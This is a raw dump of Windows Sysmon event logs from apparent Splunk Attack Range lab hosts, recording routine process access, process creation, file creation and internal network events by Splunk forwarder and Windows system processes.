10:50:20.965{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.965{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.965{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.965{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-116C-6216-0B05-000000003802}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.965{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-116C-6216-0B05-000000003802}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.966{C8EA50B7-116C-6216-0B05-000000003802}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.699{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=925715B199E1B091CD7584C5EA6AB99D,SHA256=18DA19A60BE8675177070D7AAE034C68BE6C1B81AAF0122552C5FB058217302B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.699{C8EA50B7-116C-6216-0A05-000000003802}2816840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.465{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-116C-6216-0A05-000000003802}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.465{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-116C-6216-0A05-000000003802}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.465{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-116C-6216-0A05-000000003802}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.466{C8EA50B7-116C-6216-0A05-000000003802}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000287668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.230{C8EA50B7-116B-6216-0905-000000003802}58204264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216570Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:21.692{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C047A6030DFB9F7D02CBCED14B21818D,SHA256=3AE7695C430958715551B356844C24DD4392A4C55B0A2C3C9A835062713507D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:21.715{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=747CDCFF2ABA57043A42F12EBF6C5D27,SHA256=A8B7388FF8FCCBD333023FDC2F078B9FFED67C48B4343C343DA6DB12231B3204,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216571Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:22.926{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70F3069C808909F6D881143C19DBF375,SHA256=3E2AC6D5ADC3417C1E7ADE5A9DB4C967E2B0E973E419B9C66F14FABABF40265A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.735{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53435-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:22.715{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14738CFA29F1CE9975F1BE510F30B864,SHA256=15A1BDB59612003591E3631B559D3F585DFD4C9E984764F59B4305090FA73761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:23.730{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CEE2C934D17FFCE6E333972E37988B7,SHA256=E465D3999112B140122D151C4B059D7C0634E64CA1433A80C1FDB46F06C7BFB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:24.762{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B9F2B47AFF8F11C955F7B818B0E0692,SHA256=1D559FBABBBD8AF9F7E58FEFB368F0622AFDD7BCE1AC21C91CB4772278ABAA89,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216573Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:21.680{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51336-false10.0.1.12-8000- 23542300x8000000000000000216572Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:24.113{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=724E500A99ABF3B44CCD604C9A4CC91E,SHA256=DD057E6D5F39592AEB5B7BFDB9019AA33B089F4BBE1D794CC6888A9DE60BDC55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:25.809{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4090F2B4CA203F028611AE653FA3850,SHA256=43D2872265D6ECCE84198C965A0DFBD2555A05AFB6C1983CF5E8B15220FDFFCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216574Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:25.192{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8220D445F5F37104C7361158CC0774BF,SHA256=A7B49176E5F2E8FDC54100A8CE7342B92D3FF8E2478BBD78F4BF2A77A0F598F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.824{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9DA0883623A7EC89F56A961F393A361,SHA256=25F4DD4671F56AC0D7C5645C6307F4A7BD05FA69CEC6ED93D42B67E2B879027A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216575Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:26.223{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE9C9DDC47F3CE43D733C993D9F5B363,SHA256=C4FE7E8CD7958E80263563E033E1EF988821A71B66549ADB5E03E0AEF841FAEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.169{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\WindowsUpdate.logMD5=038356387332650843BCB352BB89A101,SHA256=492C9B102256321FB5598FF87ED5BCCAB8159F36DD8416CE4011FFBF5E96048D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.152{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.091{C8EA50B7-1172-6216-0D05-000000003802}59083308C:\Windows\system32\conhost.exe{C8EA50B7-1172-6216-0C05-000000003802}5320C:\Windows\system32\sc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.059{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1172-6216-0D05-000000003802}5908C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.059{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 